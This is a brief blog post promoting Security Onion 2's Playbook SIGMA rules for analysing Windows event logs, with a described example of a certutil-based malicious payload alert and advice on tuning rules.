🧅Security Onion Playbook SIGMA Rules
It's no secret that the Security Onion team has poured an incredible amount of effort into creating their groundbreaking SO2 platform. With each new release, they raise the bar for defenders everywhere, leaving attackers on their toes.
As a self-proclaimed SIEM aficionado, I default to the Onion every time. The network logging mechanisms, Zeek and Suricata, perform phenomenally, especially in a distributed architecture. But one feature that truly stands out to me is Playbook.
By using Winlogbeats to send Windows event logs (such as Security, Application, PowerShell/Operational, and Sysmon) to the Security Onion Manager, analysts can comb through the data using Playbook SIGMA rules. With almost 500 pre-built SIGMA rules by default, even entry-level analysts can get a great head start.
Of course, like any logging and alerting mechanism, rules will need to be fine-tuned to fit the environment and prevent false positives. But with the help of rule tuning, analysts can quickly highlight which rules are valid and which may need some adjustments.
Check out the example below to see just how powerful rule tuning can be when it comes to highlighting potential threats.
Diving deeper into Suspicious Certutil Command Alert we can inspect each parsed field and verify that this indeed is malicious. Simply hover over the alert left-click > drill-down and you’ll be taken that rule of your choosing.
Here we can see that bob has been practicing bad cyber awareness and opened an Excel doc which spawned a malicious payload using certutil.
Looking further into Playbook its easy to see just how malleable SIGMA rules are. Tunning the rules are simple and very straightforward. In later blogs, I’ll dive deeper into how to make adjustments and create filters to aid in sifting out false positives.
If you’re having a hard time understanding how to obtain logs from an endpoint or what to use, then don’t worry I got you covered. Visit my GitHub link below and see some of the packages I put together for sending hosts logs to Security Onion 2 via Winlogbeats. The package will also contain a Sysmon binary and Sysmon config from Olaf Hartong’s GitHub repository. Also, in my later post I outline what to use to test your logging mechanism to ensure you have the best view on what’s happening in your environment! Happy hunting!
For SIGMA Rule tunning check out my video below to give you some ideas on how best to test your SIGMA rules. Enjoy!!
Last updated
Was this helpful?